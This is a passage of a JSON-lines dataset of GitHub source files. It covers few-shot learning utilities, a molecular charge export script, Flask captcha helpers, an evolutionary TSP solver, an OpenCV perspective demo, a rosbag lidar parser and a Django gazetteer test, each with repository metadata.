2, 2, 1],\r\n flatten=False).cuda()\r\n elif options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det' or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 1, 1],\r\n flatten=False).cuda()\r\n elif options.network == 'ResNet_star_hi':\r\n if options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det' or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n\r\n elif options.network == 'ResNet_star_2stage':\r\n networks = []\r\n for iNet in range(2):\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n elif options.dataset == 'cub':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n elif options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det'or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 1, 1], # there are multiple options here\r\n flatten=False).cuda()\r\n networks.append(network)\r\n network = networks\r\n\r\n elif options.network == 'ResNet_star_2stage_hi':\r\n networks = []\r\n for iNet in range(2):\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n elif options.dataset == 'cub':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n elif options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det' or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 1, 2], # there are multiple options here\r\n flatten=False).cuda()\r\n networks.append(network)\r\n network = networks\r\n else:\r\n print(\"Cannot recognize the network type\")\r\n assert (False)\r\n\r\n # Choose the classification head\r\n if options.head == 'ProtoNet':\r\n cls_head = ClassificationHead(base_learner='ProtoNet').cuda()\r\n if options.head == 'StarNet':\r\n cls_head = ClassificationHead(base_learner='StarNet', split_scales = bool(options.split_head_scales)).cuda()\r\n elif options.head == 'Ridge':\r\n cls_head = ClassificationHead(base_learner='Ridge').cuda()\r\n elif options.head == 'R2D2':\r\n cls_head = ClassificationHead(base_learner='R2D2').cuda()\r\n elif options.head == 'SVM':\r\n cls_head = ClassificationHead(base_learner='SVM-CS').cuda()\r\n else:\r\n print(\"Cannot recognize the dataset type\")\r\n assert (False)\r\n\r\n return (network, cls_head)\r\n\r\ndef print_memory_usage(log_file_path = None):\r\n process = psutil.Process(os.getpid())\r\n mem_usage_bytes = process.memory_info().rss\r\n gpu_mem_bytes = torch.cuda.memory_allocated()\r\n usage_str_cpu = 'CPU memory usage: {:.1f} GB / {:.1f} MB'.format(mem_usage_bytes / (1024 ** 3), mem_usage_bytes / (1024 ** 2))\r\n usage_str_gpu = 'GPU memory usage: {:.1f} GB / {:.1f} MB'.format(gpu_mem_bytes / (1024 ** 3), gpu_mem_bytes / (1024 ** 2))\r\n if log_file_path is None:\r\n print(usage_str_cpu)\r\n print(usage_str_gpu)\r\n else:\r\n log(log_file_path, usage_str_cpu)\r\n log(log_file_path, usage_str_gpu)\r\n\r\ndef one_hot(indices, depth):\r\n \"\"\"\r\n Returns a one-hot tensor.\r\n This is a PyTorch equivalent of Tensorflow's tf.one_hot.\r\n\r\n Parameters:\r\n indices: a (n_batch, m) Tensor or (m) Tensor.\r\n depth: a scalar. Represents the depth of the one hot dimension.\r\n Returns: a (n_batch, m, depth) Tensor or (m, depth) Tensor.\r\n \"\"\"\r\n\r\n encoded_indicies = torch.zeros(indices.size() + torch.Size([depth])).cuda()\r\n index = indices.view(indices.size() + torch.Size([1]))\r\n encoded_indicies = encoded_indicies.scatter_(1, index, 1)\r\n\r\n return encoded_indicies\r\n\r\ndef finetune(\r\n embedding_net, cls_head,\r\n data_support, labels_support, data_query, labels_query,\r\n opt,\r\n learning_rate, num_iters,\r\n head='StarNet', train_query=1, train_way=5, train_shot=1, episodes_per_batch = 1, eps = 0.1\r\n):\r\n if type(embedding_net) is list:\r\n # pGroups = [{'params': net.parameters()} for net in embedding_net]\r\n # optimizer = torch.optim.SGD(\r\n # pGroups + [{'params': cls_head.parameters()}],\r\n # lr=learning_rate, momentum=0.9, weight_decay=5e-4, nesterov=True\r\n # )\r\n pGroups = [{'params': net.parameters()} for net in embedding_net[1:]]\r\n optimizer = torch.optim.SGD(\r\n pGroups,\r\n lr=learning_rate, momentum=0.9, weight_decay=5e-4, nesterov=True\r\n )\r\n else:\r\n optimizer = torch.optim.SGD([{'params': embedding_net.parameters()},\r\n {'params': cls_head.parameters()}], lr=learning_rate, momentum=0.9, \\\r\n weight_decay=5e-4, nesterov=True)\r\n\r\n lambda_epoch = lambda e: 1.0 if e < 20 else 1.0\r\n\r\n lr_scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_epoch, last_epoch=-1)\r\n\r\n # no need as we actually need the model in eval mode\r\n # # move to train mode\r\n # if type(embedding_net) is list:\r\n # for net in embedding_net:\r\n # net.train()\r\n # cls_head.train()\r\n # else:\r\n # _, _ = [x.train() for x in (embedding_net, cls_head)]\r\n\r\n # we set to eval mode to keep the batch norms fixed\r\n if type(embedding_net) is list:\r\n for net in embedding_net:\r\n net.eval()\r\n cls_head.eval()\r\n else:\r\n _, _ = [x.eval() for x in (embedding_net, cls_head)]\r\n\r\n train_accuracies = []\r\n train_losses = []\r\n train_accuracies_parts = []\r\n train_losses_parts = []\r\n\r\n for i in range(1, num_iters + 1):\r\n # Train on the training split\r\n lr_scheduler.step()\r\n\r\n if type(embedding_net) is list:\r\n embedding_net_st1 = embedding_net[0]\r\n embedding_net_st2 = embedding_net[1] # TODO: support more then one\r\n else:\r\n embedding_net_st1 = embedding_net\r\n embedding_net_st2 = None\r\n\r\n train_n_support = train_way * train_shot\r\n train_n_query = train_way * train_query\r\n\r\n emb_support = embedding_net_st1(data_support.reshape([-1] + list(data_support.shape[-3:])))\r\n if 'Star' in head:\r\n emb_support = emb_support.reshape(\r\n [episodes_per_batch, train_n_support] + list(emb_support.shape[-3:]))\r\n else:\r\n emb_support = emb_support.reshape(opt.episodes_per_batch, train_n_support, -1)\r\n\r\n emb_query = embedding_net_st1(data_query.reshape([-1] + list(data_query.shape[-3:])))\r\n if 'Star' in head:\r\n emb_query = emb_query.reshape([episodes_per_batch, train_n_query] + list(emb_query.shape[-3:]))\r\n else:\r\n emb_query = emb_query.reshape(episodes_per_batch, train_n_query, -1)\r\n\r\n s2_emb_support, s2_emb_query = None, None\r\n if embedding_net_st2 is not None:\r\n s2_emb_support = embedding_net_st2(data_support.reshape([-1] + list(data_support.shape[-3:])))\r\n if 'Star' in head:\r\n s2_emb_support = s2_emb_support.reshape(\r\n [episodes_per_batch, train_n_support] + list(s2_emb_support.shape[-3:]))\r\n else:\r\n s2_emb_support = s2_emb_support.reshape(episodes_per_batch, train_n_support, -1)\r\n\r\n s2_emb_query = embedding_net_st2(data_query.reshape([-1] + list(data_query.shape[-3:])))\r\n if 'Star' in head:\r\n s2_emb_query = s2_emb_query.reshape(\r\n [episodes_per_batch, train_n_query] + list(s2_emb_query.shape[-3:]))\r\n else:\r\n s2_emb_query = s2_emb_query.reshape(opt.episodes_per_batch, train_n_query, -1)\r\n\r\n logit_query = cls_head(emb_query, emb_support, labels_support, train_way, train_shot,\r\n s2_query=s2_emb_query, s2_support=s2_emb_support, opt=opt)\r\n\r\n if type(logit_query) is not list:\r\n logit_query = [logit_query]\r\n\r\n smoothed_one_hot = one_hot(labels_query.reshape(-1), train_way)\r\n smoothed_one_hot = smoothed_one_hot * (1 - eps) + (1 - smoothed_one_hot) * eps / (train_way - 1)\r\n\r\n loss = 0.0\r\n loss_parts = [0.0] * len(logit_query)\r\n for iQ, lq in enumerate(logit_query):\r\n log_prb = F.log_softmax(lq.reshape(-1, train_way), dim=1)\r\n loss_ = -(smoothed_one_hot * log_prb).sum(dim=1)\r\n loss_parts[iQ] = loss_.mean()\r\n loss += loss_parts[iQ]\r\n\r\n probs_query = [F.softmax(lq, dim=2) for lq in logit_query]\r\n logit_query = torch.stack(probs_query, dim=0).sum(dim=0) / float(len(logit_query))\r\n\r\n acc = count_accuracy(logit_query.reshape(-1, train_way), labels_query.reshape(-1))\r\n acc_parts = [\r\n count_accuracy(pq.reshape(-1, train_way), labels_query.reshape(-1))\r\n for pq in probs_query\r\n ]\r\n\r\n train_accuracies.append(acc.item())\r\n train_losses.append(loss.item())\r\n train_accuracies_parts.append([x.item() for x in acc_parts])\r\n train_losses_parts.append([x.item() for x in loss_parts])\r\n\r\n train_acc_avg = np.mean(np.array(train_accuracies))\r\n loss_avg = np.mean(np.array(train_losses))\r\n train_acc_avg_parts = np.mean(np.array(train_accuracies_parts), axis=0)\r\n loss_avg_parts = np.mean(np.array(train_losses_parts), axis=0)\r\n\r\n if False:\r\n print(\r\n 'Iter: [{}/{}]\\tLoss: {:.4f} ({:.4f}, {})\\tAccuracy: {:.2f}% ({:.2f}%, {})'.format(\r\n i, num_iters, loss_avg, loss.item(), loss_avg_parts, train_acc_avg, acc,\r\n train_acc_avg_parts)\r\n )\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # # get back to test mode\r\n # if type(embedding_net) is list:\r\n # for net in embedding_net:\r\n # net.eval()\r\n # cls_head.eval()\r\n # else:\r\n # _, _ = [x.eval() for x in (embedding_net, cls_head)]\r\n\r\ndef convert_batch2vis(img_orig,mean_pix,std_pix):\r\n img = np.asarray(img_orig)\r\n img = img * std_pix.reshape(3, 1, 1)\r\n img = img + mean_pix.reshape(3, 1, 1)\r\n img = img[[2, 1, 0], :, :]\r\n img = img.astype(np.uint8)\r\n img = img.transpose([1, 2, 0])\r\n return img\r\n\r\ndef convert_vis2batch(img,mean_pix,std_pix):\r\n normalize = transforms.Normalize(mean=mean_pix, std=std_pix)\r\n img = img.astype(np.float32)/255\r\n img = img.transpose([2, 0, 1])\r\n img = img[[2, 1, 0], :, :]\r\n img = torch.tensor(img)\r\n img = img.type(torch.FloatTensor)\r\n img = normalize(img)\r\n return img\r\n","repo_name":"jshtok/StarNet","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15519,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"33027108129","text":"import functools\nimport pickle\nfrom multiprocessing import Pool\nfrom typing import List, Optional\n\nimport click\nimport numpy\nimport rich\nimport rich.console\nimport torch\nfrom models import PartialChargeModelV1\nfrom nagl.utilities.toolkits import capture_toolkit_warnings\nfrom openff.recharge.charges.library import (\n LibraryChargeCollection,\n LibraryChargeParameter,\n)\nfrom openff.recharge.esp.storage import MoleculeESPRecord\nfrom openff.toolkit.topology import Molecule\nfrom rich import pretty\nfrom rich.progress import track\n\n\n@functools.lru_cache()\ndef strip_map_indices(smiles: str) -> str:\n return Molecule.from_mapped_smiles(smiles, allow_undefined_stereo=True).to_smiles(\n mapped=False\n )\n\n\ndef to_library_parameter(\n smiles: str, model_path: str\n) -> Optional[LibraryChargeParameter]:\n\n from simtk import unit as simtk_unit\n\n error_console = rich.console.Console(stderr=True)\n\n try:\n\n with capture_toolkit_warnings():\n\n molecule = Molecule.from_smiles(smiles, allow_undefined_stereo=True)\n\n model = PartialChargeModelV1.load_from_checkpoint(\n model_path, map_location=torch.device(\"cpu\")\n )\n charge_tensor = model.compute_charges(molecule).detach().numpy()\n charges = [float(x) for x in charge_tensor.flatten().tolist()]\n\n total_charge = molecule.total_charge.value_in_unit(\n simtk_unit.elementary_charge\n )\n sum_charge = sum(charges)\n\n charge_difference = total_charge - sum_charge\n assert numpy.isclose(charge_difference, 0.0, atol=1.0e-4)\n\n # Fix the summed charge not being within a strict precision of the total\n # charge\n charges = [\n charge + charge_difference / molecule.n_atoms for charge in charges\n ]\n\n smiles = molecule.to_smiles(mapped=True)\n\n return LibraryChargeParameter(smiles=smiles, value=charges)\n\n except BaseException:\n\n error_console.print(f\"failed generating charges for {smiles}\")\n error_console.print_exception()\n return None\n\n\n@click.command()\n@click.option(\n \"--input-records\",\n \"input_records_path\",\n type=click.Path(exists=True, file_okay=True, dir_okay=False),\n required=True,\n)\n@click.option(\n \"--input-checkpoint\",\n \"model_path\",\n type=click.Path(exists=True, file_okay=True, dir_okay=False),\n required=True,\n)\n@click.option(\n \"--output\",\n \"output_path\",\n type=click.Path(exists=False, file_okay=True, dir_okay=False),\n required=True,\n)\n@click.option(\"--n-processes\", type=int, default=1)\ndef main(input_records_path, model_path, output_path, n_processes):\n\n console = rich.get_console()\n pretty.install(console)\n\n with capture_toolkit_warnings():\n\n with open(input_records_path, \"rb\") as file:\n with console.status(\"loading ESP records\"):\n esp_records_test: List[MoleculeESPRecord] = pickle.load(file)[\n \"esp-records\"\n ]\n console.print(f\"loaded {len(esp_records_test)} records\")\n\n smiles = sorted(\n {\n strip_map_indices(record.tagged_smiles)\n for record in track(\n esp_records_test, description=\"finding unique SMILES\"\n )\n }\n )\n\n console.print(f\"found {len(smiles)} unique SMILES\")\n\n with Pool(processes=n_processes) as pool:\n\n to_library_parameter_func = functools.partial(\n to_library_parameter, model_path=model_path\n )\n\n parameters = list(\n track(\n pool.imap(to_library_parameter_func, smiles),\n description=\"charging\",\n total=len(smiles),\n )\n )\n\n parameters = [parameter for parameter in parameters if parameter is not None]\n charge_collection = LibraryChargeCollection(parameters=parameters)\n\n with open(output_path, \"w\") as file:\n file.write(charge_collection.json(indent=2))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SimonBoothroyd/gnn-charge-models","sub_path":"train-charge-models/gnn-charge-models/export-model-charges.py","file_name":"export-model-charges.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41244587280","text":"#-*- coding:utf-8 -*-\n# author:Agam\n# datetime:2018-11-05\n\n\nimport datetime\nimport random\nimport string\nfrom PIL import Image, ImageFont, ImageDraw, ImageFilter\nfrom sqlalchemy import extract, func\nfrom app.apps import db\nfrom app.models import Purchase, sales,warehouse,goods\n\n\ndef rndColor():\n '''随机颜色'''\n return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))\n\ndef gene_text():\n '''生成4位验证码'''\n return ''.join(random.sample(string.ascii_letters+string.digits, 4))\n\ndef draw_lines(draw, num, width, height):\n '''划线'''\n for num in range(num):\n x1 = random.randint(0, width / 2)\n y1 = random.randint(0, height / 2)\n x2 = random.randint(0, width)\n y2 = random.randint(height / 2, height)\n draw.line(((x1, y1), (x2, y2)), fill='black', width=1)\n\ndef get_verify_code():\n '''生成验证码图形'''\n code = gene_text()\n # 图片大小120×50\n width, height = 120, 50\n # 新图片对象\n im = Image.new('RGB',(width, height),'white')\n # 字体\n font = ImageFont.truetype('app/static/arial.ttf', 40)\n # draw对象\n draw = ImageDraw.Draw(im)\n # 绘制字符串\n for item in range(4):\n draw.text((5+random.randint(-3,3)+23*item, 5+random.randint(-3,3)),\n text=code[item], fill=rndColor(),font=font )\n # 划线\n draw_lines(draw, 2, width, height)\n # 高斯模糊\n im = im.filter(ImageFilter.GaussianBlur(radius=1.5))\n return im, code\n\n\n\n\n\n\n# 生成编号\ndef on_created():\n nowTime = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"); # 生成当前时间\n randomNum = random.randint(0, 100); # 生成的随机整数n,其中0<=n<=100\n if randomNum <= 10:\n randomNum = str(0) + str(randomNum);\n uniqueNum = str(nowTime) + str(randomNum);\n return uniqueNum\n\n\n\n\n\n\n\n","repo_name":"BOTHSAVAGE/flaskDemo","sub_path":"app/admin/uilt.py","file_name":"uilt.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3451069131","text":"import re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import rankdata\nimport copy\nimport matplotlib.pyplot as plt\n\nINF = 9999999999\n\n\nclass Individual:\n def __init__(self, genes, num_task):\n self.genes = genes\n self.genes_len = len(genes)\n self.has_2_parents = False\n self.parents = []\n self.factorial_cost = [INF] * num_task\n self.factorial_rank = [INF] * num_task\n self.scalar_fitness = INF\n self.skill_factor = None\n\n def update_skill_factor(self):\n self.skill_factor = np.argmin(self.factorial_rank, axis=0)\n\n def update_scalar_fitness(self):\n self.scalar_fitness = 1 / np.min(self.factorial_rank)\n\n\nclass Population:\n def __init__(self, genes_length, num_individual):\n self.num_individuals = num_individual\n self.individuals = [None] * num_individual\n self.genes_length = genes_length\n\n def generate(self):\n for i in range(self.num_individuals):\n genes = np.random.permutation(self.genes_length)\n individual = Individual(genes, num_task=2) # TODO: fix this\n self.individuals[i] = individual\n\n def __getitem__(self, item):\n return self.individuals[item]\n\n def __setitem__(self, key, value):\n self.individuals[key] = value\n\n def __add__(self, other):\n if not isinstance(other, Population):\n raise Exception(\"Invalid argument\")\n new_pop = Population(self.genes_length, self.num_individuals + other.num_individuals)\n new_pop.individuals[:self.num_individuals] = self.individuals\n new_pop.individuals[self.num_individuals:] = other.individuals\n return new_pop\n\n\ndef mutate(p):\n point_1, point_2 = sorted(np.random.choice(len(p), 2, replace=False))\n # Flip\n ret = np.copy(p)\n tmp = p[point_1:point_2 + 1]\n ret[point_1:point_2 + 1] = tmp[::-1]\n return ret\n\n\n# Partially Mapped Crossover Operator\ndef _crossover(p1, p2, point_1, point_2):\n def __crossover(p1, p2):\n child = np.empty_like(p1)\n child.fill(-1)\n child[point_1 + 1:point_2 + 1] = p2[point_1 + 1:point_2 + 1]\n for (index, value) in enumerate(child):\n if value != -1:\n continue\n p_value = p1[index]\n while p_value in child:\n p_value = p1[np.where(p2 == p_value)[0][0]]\n child[index] = p_value\n return child\n\n child_1 = __crossover(p1, p2)\n child_2 = __crossover(p2, p1)\n return child_1, child_2\n\n\nclass MFEA:\n def __init__(self, num_task):\n self.num_task = num_task\n self.cost_functions = [None] * num_task\n self.max_genes_length = 17\n self.pop_num = 10\n self.num_loop = 100\n self.rmp = 0.5 # Random mating probability\n self.pop = None\n\n def set_cost_function(self, task_index, eval_func):\n self.cost_functions[task_index] = eval_func\n\n def mutate(self, individual):\n child_genes = mutate(individual.genes)\n child = Individual(child_genes, self.num_task)\n child.has_2_parents = False\n child.parents = [individual]\n return child\n\n def crossover(self, individual_1, individual_2):\n point_1, point_2 = sorted(np.random.choice(len(individual_1.genes) - 1, 2, replace=False))\n genes_1 = individual_1.genes\n genes_2 = individual_2.genes\n child_genes_1, child_genes_2 = _crossover(genes_1, genes_2, point_1, point_2)\n child_1 = Individual(child_genes_1, self.num_task)\n child_1.parents = [individual_1, individual_2]\n child_2 = Individual(child_genes_2, self.num_task)\n child_2.parents = [individual_1, individual_2]\n return child_1, child_2\n\n def ranking(self, pop):\n num_task = self.num_task\n cost_table = np.zeros((num_task, pop.num_individuals))\n for t in range(num_task):\n for (i, individual) in enumerate(pop.individuals):\n cost_table[t][i] = individual.factorial_cost[t]\n rank_table = np.empty_like(cost_table)\n for t in range(num_task):\n rank_table[t] = rankdata(cost_table[t])\n for i in range(pop.num_individuals):\n pop[i].factorial_rank = rank_table[:, i]\n\n def run(self):\n self.pop = Population(self.max_genes_length, self.pop_num)\n pop = self.pop\n pop.generate()\n num_task = self.num_task\n pop_num = self.pop_num\n rmp = self.rmp\n # Evaluate every individual with respect every optimization task\n for t in range(num_task):\n for individual in pop.individuals:\n individual.factorial_cost[t] = self.cost_functions[t](individual)\n\n # Compute the skill factor of each individual\n self.ranking(pop)\n for individual in pop.individuals:\n individual.update_skill_factor()\n\n # Main loop\n self.history = []\n for _ in range(self.num_loop):\n # Apply genetic operators on current pop to generate an offspring pop\n offspring_pop = Population(self.max_genes_length, pop_num)\n count = 0\n while count < pop_num:\n # Assortative mating\n i1, i2 = np.random.choice(pop_num, 2, replace=False)\n idvd1 = pop[i1]\n idvd2 = pop[i2]\n rand = np.random.rand()\n if idvd1.skill_factor == idvd2.skill_factor or rand < rmp:\n child_1, child_2 = self.crossover(idvd1, idvd2)\n else:\n child_1 = self.mutate(idvd1)\n child_2 = self.mutate(idvd2)\n\n offspring_pop[count] = child_1\n offspring_pop[count + 1] = child_2\n count += 2\n\n # Evaluate the individuals in offspring-pop for selected optimization tasks only\n for individual in offspring_pop.individuals:\n if individual.has_2_parents:\n rand = np.random.rand()\n if rand < 0.5:\n skill_factor = individual.parents[0].skill_factor\n else:\n skill_factor = individual.parents[1].skill_factor\n else:\n skill_factor = individual.parents[0].skill_factor\n individual.factorial_cost[skill_factor] = self.cost_functions[skill_factor](individual)\n for j in range(num_task):\n if j != skill_factor:\n individual.factorial_cost[j] = INF\n\n # Concatentate offspring-pop and current pop to form and intermediate-pop\n intermediate_pop = pop + offspring_pop\n\n # Update the scalar fitness and skill factor of every individual in intermediate-pop\n self.ranking(intermediate_pop)\n for individual in intermediate_pop.individuals:\n individual.update_scalar_fitness()\n individual.update_skill_factor()\n\n # Select the fittest individuals from intermediate-pop to form the next current pop\n fitness_table = np.empty(intermediate_pop.num_individuals)\n for (i, individual) in enumerate(intermediate_pop.individuals):\n fitness_table[i] = individual.scalar_fitness\n selected_indices = np.argsort(fitness_table)[-pop_num:][::-1]\n new_individuals = []\n for i in selected_indices:\n new_individuals.append(intermediate_pop[i])\n pop = Population(self.max_genes_length, self.pop_num)\n pop.individuals = new_individuals\n self.pop = pop\n\n # Trace\n best_0 = pop.individuals[0].factorial_cost[0]\n best_1 = pop.individuals[0].factorial_cost[1]\n for individual in pop.individuals:\n best_0 = min(best_0, individual.factorial_cost[0])\n best_1 = min(best_1, individual.factorial_cost[1])\n self.history.append([best_0, best_1])\n\ndef read_matrix_file(filename):\n mat = []\n with open(filename) as f:\n lines = f.readlines()\n N = len(lines)\n for line in lines:\n mat.append(re.split(\"\\s+\", line)[1:N + 1])\n\n for i in range(N):\n for j in range(N):\n mat[i][j] = int(mat[i][j])\n return mat, N\n\n\nif __name__ == '__main__':\n mat_1, N1 = read_matrix_file(\"p01_d.txt\")\n mat_2, N2 = read_matrix_file(\"gr17_d.txt\")\n\n\n def calc_cost(genes, mat):\n sum_cost = 0\n for i in range(len(genes) - 1):\n a = genes[i]\n b = genes[i + 1]\n sum_cost += mat[a][b]\n sum_cost += mat[len(genes) - 1][0]\n return sum_cost\n\n\n def cost_func_1(individual):\n # Decode genes\n genes = np.array(individual.genes)\n genes = genes[genes < N1]\n return calc_cost(genes, mat_1)\n\n\n def cost_func_2(individual):\n return calc_cost(individual.genes, mat_2)\n\n\n tsp_mfea = MFEA(2)\n tsp_mfea.set_cost_function(0, cost_func_1)\n tsp_mfea.set_cost_function(1, cost_func_2)\n tsp_mfea.pop_num = 100\n tsp_mfea.num_loop = 400\n tsp_mfea.rmp = 0.5 # Random mating probability\n tsp_mfea.run()\n for individual in tsp_mfea.pop:\n print(individual.genes)\n print(min(individual.factorial_cost))\n plt.plot(tsp_mfea.history)\n plt.show()\n","repo_name":"dranhclub/Truck-drone-tandem-delivery-network","sub_path":"dummy/tsp_mfea.py","file_name":"tsp_mfea.py","file_ext":"py","file_size_in_byte":9386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30417261966","text":"import cv2\nimport time\nimport os\nimport numpy as np\n\npath = os.path.dirname(os.path.abspath(__file__))\nimg = cv2.imread(path + '/lena.png')\n\nimg_perspective = img.copy()\nh, w = img.shape[:2]\n\n# 設定四對點,並取得 perspective 矩陣\npoint1 = np.array([[60, 40], [420, 40], [420, 510], [60, 510]], dtype=np.float32)\npoint2 = np.array([[0, 80], [w, 120], [w, 430], [0, 470]], dtype=np.float32)\nM = cv2.getPerspectiveTransform(point1, point2)\n\n# perspective 轉換\nimg_perspective = cv2.warpPerspective(img, M, (w, h))\n\n# 組合 + 顯示圖片\nimg_show = np.hstack((img, img_perspective))\nwhile True:\n cv2.imshow('perspective transform', img_show)\n k = cv2.waitKey(0)\n if k == 27:\n cv2.destroyAllWindows()\n break","repo_name":"ken3527549/1st-DL-CVMarathon","sub_path":"Day007_perspective_transformation.py","file_name":"Day007_perspective_transformation.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1951910552","text":"\n#By default input is taken as string\na=input()\nprint(type(a)) #Will return class as string \n\n\n\n\n#By default division will return float\nb=2/2\nprint(type(b)) #return float , ans is 1.0\n\n\n\n\n# convertions\nstr()\nint()\nfloat()\n \n# the things which want to convert need to written between ()\n\n\n\n\n","repo_name":"VigneshReddyJulakanti/Harry_python","sub_path":"typecasting/typecasting.py","file_name":"typecasting.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21221324805","text":"import sensor_msgs.point_cloud2 as pc2\nimport rosbag\nimport csv\nimport os\n\npath = './cole-driving-downtown'\n\n\ndef distance_from_center(x, y, z):\n return (x ** 2 + y ** 2 + z ** 2) ** .5\n\n\nwith open('lidar.csv', 'w') as lidar_file:\n file_writer = csv.writer(\n lidar_file,\n delimiter=',',\n quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n\n file_writer.writerow([\"rosbag_time\", \"close\", \"front close\", \"front medium\", \"front far\"])\n\n bags = []\n for filename in os.listdir(path):\n if filename.endswith('.bag'):\n bags.append(path + '/' + filename)\n bags.sort()\n\n bags = sorted([rosbag.Bag(b) for b in bags])\n\n for b in bags:\n for _, msg, t in b.read_messages(topics=['/velodyne_points']):\n close = 0\n total = 0\n front_close_dot_num, front_medium_dot_num, front_far_dot_num = 0, 0, 0\n for p in pc2.read_points(msg):\n total += 1\n\n if p[2] < 0 and distance_from_center(p[0], p[1], p[2]) < 1.4:\n close += 1\n\n # front_close_dot_num\n if p[1] > -1.4 and p[1] < 1.4 and p[2] > -1.6 and p[2] < 0:\n if p[0] <= 5.4 and p[0] > 1.4:\n front_close_dot_num += 1\n elif p[0] > 5.4 and p[0] <= 9.4:\n front_medium_dot_num += 1\n elif p[0] > 9.4:\n front_far_dot_num += 1\n\n file_writer.writerow([t, close, front_close_dot_num, front_medium_dot_num, front_far_dot_num])\n","repo_name":"ananthagarwal/EECS-149-Project","sub_path":"DataOrganization/car_detection.py","file_name":"car_detection.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27128720828","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\nimport datetime\nimport json\nfrom mapstory.tests import MapStoryTestMixin, AdminClient\nfrom .models import Location,LocationName\nfrom skosxl.models import Notation, Concept\n\n\nclass GazTest(TestCase):\n\n fixtures = ['gaz_featuretypes_skos.json']\n def setUp(self):\n # LocationType.objects.create(code=\"PPL\", label=\"Populated Place\", definition = \"def\", citation = \"http://www.geonames.org/export/codes.html\")\n Location.objects.create(defaultName=\"Wollongong\", locationType=LocationType.objects.first(), latitude=-34.433056 , longitude=150.883057 )\n LocationName.objects.create(name=\"Wollongong\", language='en', location=Location.objects.first() )\n LocationName.objects.create(name=\"http://dbpedia.org/resource/Wollongong\", namespace=\"http://dbpedia.org/resource/\", location=Location.objects.first() )\n \n def test_location_match(self):\n \"\"\"\n Tests finding a gazetteer entry.\n \"\"\"\n\n data = json.loads ( '''{\n \"locationType\": \"PPL\",\n \"names\": [\n {\n \"name\": \"Wollongong\",\n \"language\": \"en\"\n }\n ]\n }''' )\n \n \n c = AdminClient()\n response = c.post(reverse('matchloc'), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200, 'Not found: body ' + response.content )\n locr = json.loads(response.content)\n \n# import ipdb; ipdb.set_trace()\n self.assertIsInstance(locr,dict,'Response type not formatted as valid dictionary' )\n self.assertTrue(locr.has_key('name_lang'),'Response does not include name+language match list' )\n self.assertEqual(len(locr['name_lang']), 1, 'Response should contain exactly one match : ' + response.content) \n self.assertEqual(locr['name_lang'][0]['defaultName'], \"Wollongong\") \n \n data = json.loads ( '''{\n \"locationType\": \"PPL\",\n \"names\": [\n {\n \"name\": \"http://dbpedia.org/resource/Wollongong\",\n \"namespace\": \"http://dbpedia.org/resource/\"\n }\n ]\n }''' )\n \n \n c = AdminClient()\n response = c.post(reverse('matchloc'), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200, 'Error matching: body ' + response.content)\n locr = json.loads(response.content)\n self.assertEqual(len(locr['name_lang']), 0, 'Response should not contain name match: ' + 